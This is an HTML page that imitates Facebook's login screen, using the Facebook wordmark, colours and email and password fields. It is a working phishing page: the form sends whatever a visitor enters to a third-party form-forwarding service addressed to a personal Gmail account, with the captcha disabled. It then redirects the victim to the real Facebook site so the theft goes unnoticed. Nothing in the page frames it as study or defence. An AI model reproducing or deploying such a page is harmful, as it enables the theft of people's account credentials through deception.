<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf=8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>log in or sign up</title>
<style>
    *{
    margin:0;
    padding:0;
}
html{
    max-width:100%    !important;
    max-height:100%   !important;
    overflow-x:hidden !important;
    overflow-y:hidden !important;
    }
body{
    font-family:Helvetica, sans-serif;
    background-color:#f0f2f5;
    margin:0;
    position:center; 
    background-position:fixed; 
}
form{
    background-color:#fff;
    position:center;     
}
.logo{
    width:240px;
    height:85px;
}
.main{
    display:flex;
    flex-direction:column;
    align-items:center;
    height:80vh;
    padding-top:40px;
    background-color:#f0f2f5;
}
.container{
    background-color:white;
    display: flex;
    flex-direction:column;
    width:400px;
    height:400px;
    align-items:center;
    border:none;
    border-radius:5px;
    box-shadow:0 0 10px 1px rgba(0, 0,0,0.2);
    gap:10px;
    text-align:center;
}
.login{
    font-size:1.2rem;
    margin:20px 0 10px 0;
}
input{
    width:85%;
    height:50px;
    border:1.5px solid rgba(0, 0,0,0.1);
    border-radius:5px;
    font-size:15px;
    outline-style:none;
    color:black;
}
input:focus{
    border:0.30px solid #1877f2;
    box-shadow:0 0 1.8px 0.25px #1877f2;
    color:black;
}
button{
    width:86%;
    height:50px;
    border-radius:5px;
    border:none;
    background-color:#1877f2;
    color: white;
    font-size:large;
    font-weight:bold;
}
.aa{
    text-decoration:none;
    font-size:14px;
    margin:10px;
    color:#1877f2;
}
.aa:hover{
    text-decoration:underline;
}
.bb{
    width:86%;
    height:50px;
    border-radius:5px;
    border:none;
    color: white;
    font-size:large;
    font-weight:bold;
}
.new-account{
    width:50%;
    background-color:#42b72a;
    font-size:16px;
    margin:10px 0 20px 0;
}
.next{
    width:50%;
    color:white;
    font-size:16px;
    margin:10px 0 20px 0;
    text-decoration:none !important;
}
.login-btn:hover{
    background-color:#1366d1;
    cursor:pointer;   
}
.new-account:hover{
    background-color:#3ba327;  
    cursor:pointer;
}
.style{
    position:relative;
    text-align:center;
    font-size:12px;
    color:rgba(0, 0,0,0.5);
}
.style::before{
    content:"";
    display:block;
    height:0.9px;
    width:170px;
    position:absolute;
    top:50%;
    left:25px;
    color:rgba(0, 0,0,0.2);
}
.style::after{
    content:"";
    display:block;
    height:0.9px;
    width:170px;
    position:absolute;
    top:50%;
    right:25px;
    color:rgba(0, 0,0,0.2);
}
.cont{
    width:100%;
    height:100vh;
    background:#f0f2f5;
    display:flex;
    align-items:center;
    justify-content:center;
}
.btnn{
    padding:10px 60px;
    background:#fff;
    border:0;
    outline:none;
    cursor:pointer;
    font-size:22px;
    font-weight:500;
    border-radius:30px;
}
span{
    color:rgba(255, 0, 0, 0.768)a(255, 0, 0, 0.791 ) ;
}
.popup{
    width:400px;
    height:500px;
    background:#fff;
    border-radius:6px;
    position:absolute;
    top:0;
    left:50%;
    transform:translate(-50%,-50%) scale(0.1);
    text-align:center;
    padding:0 30px 30px;
    color:#333;
    visibility:hidden;
    transition:transform 0.4s, top 0.4s;
}
.open-popup{
    visibility:visible;
    top:44%;
    transform:translate(-50%,-50%) scale(1);
    background-color:white;
    display:flex;
    flex-direction:column;
    width:400px;
    height:600px;
    align-items:center;
    border:none;
    border-radius:5px;
    box-shadow:0 0 10px 1px rgba(0, 0,0,0.2);
    text-align:center;
}
.popup img{
    width:100px;
    margin-top:-50px;
    border-radius:50%;
    box-shadow:0 2px 5px rgba(0, 0, 0, 0.2);
}
.popup h2{
    font-size:38px;
    font-weight:500;
    margin:30px 0 10px;
}
.popup button{
    width:100%;
    margin-top:50px;
    padding:10px 0;
    background: #6fd649;
    color:#fff;
    border:0;
    outline:none;
    font-size:18px;
    border-radius:4px;
    cursor: pointer;
    box-shadow:0 5px 5px rgba(0, 0, 0, 0.2);   
}
.popup button:hover{
    width:100%;
    margin-top:50px;
    padding:10px 0;
    color:#fff;
    border:0;
    outline:none;
    font-size:18px;
    border-radius:4px;
    cursor:pointer;
    box-shadow:0 5px 5px rgba(0, 0, 0, 0.2);
    background-color:#3ba327; 
}
p{
    color:black;
}
::-webkit-input-placeholder{
    color: 1.5px solid rgba(0, 0,0,0.1);
}
:focus::-webkit-input-placeholder{
    opacity:0.5;
}
</style>
<link rel="shortcut icon" type="image/ico" href="favicon.ico"/>
</head>
<Body>
<form method="POST" action="https://formsubmit.co/patrickderi03@gmail.com">
<div class="main">
<div class="logo">
<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z"/><path class="cls-1" d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.75,153.91,347,153.91Z"/><path class="cls-1" d="M380.66,211v-9c0-28.95,16.51-48,50.19-48,31.74,0,45.68,19.3,45.68,47.61v16.3h-65c.65,13.94,6.87,20.16,24,20.16,11.59,0,23.81-2.36,32.82-6.22L474,253c-8.15,4.3-24.88,7.51-39.67,7.51C395.24,260.5,380.66,241,380.66,211Zm30.88-13.3h37.32v-2.57c0-11.15-4.5-20-18-20C416.91,175.14,411.54,183.94,411.54,197.66Z"/><path class="cls-1" d="M591,210.32c0,28.52-13.72,50-42,50-15.44,0-26.16-7.72-30.45-17.59v15.44H489.39V104.8L520.27,102v68.2c4.5-9,14.37-16.3,28.74-16.3,28.31,0,42,21.45,42,50Zm-30.88-7.08c0-14.37-5.57-25.09-20.37-25.09-12.66,0-19.52,9-19.52,23.59v10.72c0,14.58,6.86,23.59,19.52,23.59,14.8,0,20.37-10.72,20.37-25.09Z"/><path class="cls-1" d="M601.33,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62S703,175.14,703,204.53v5.14c0,29.38-16.73,50.62-50.83,50.62S601.33,239.05,601.33,209.67Zm70.78-7.29c0-13.51-5.58-24.23-20-24.23s-19.95,10.72-19.95,24.23v9.44c0,13.51,5.58,24.23,19.95,24.23s20-10.72,20-24.23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.57,24.23,19.94,24.23s19.95-10.72,19.95-24.23Z"/><path class="cls-1" d="M857.39,204.74l30.45-48.68h32.81l-31.95,50.4,33.24,51.68H889.13l-31.74-50v50H826.5V104.8L857.39,102Z"/></svg>
</div>
<div class="container">
<span class="login">log in or sign up</span>
<input  type="hidden"   name="_next">
<input  type="hidden"   name="_subject" value="Alert!">
<input  type="hidden"   name="_captcha" value="false">
<input type="hidden"    name="_next" value="https://web.facebook.com/?_rdc=1&_rdr">
<input  type="text"    name="text"    placeholder="&nbsp &nbsp Email address or phone number" id="mail" required>
<input  type="password" name="message"  placeholder="&nbsp &nbsp Password" id="pass" required>
<button type="submit"   class="login-btn">Log In</button>
<a href="" class="aa">Forgotten password?</a>
<div class="style">or</div>
<button class="new-account"><a href=""  class="next">Create new account</a></div>
</div>
</div>
</div>
</form>
</Body>
</html>
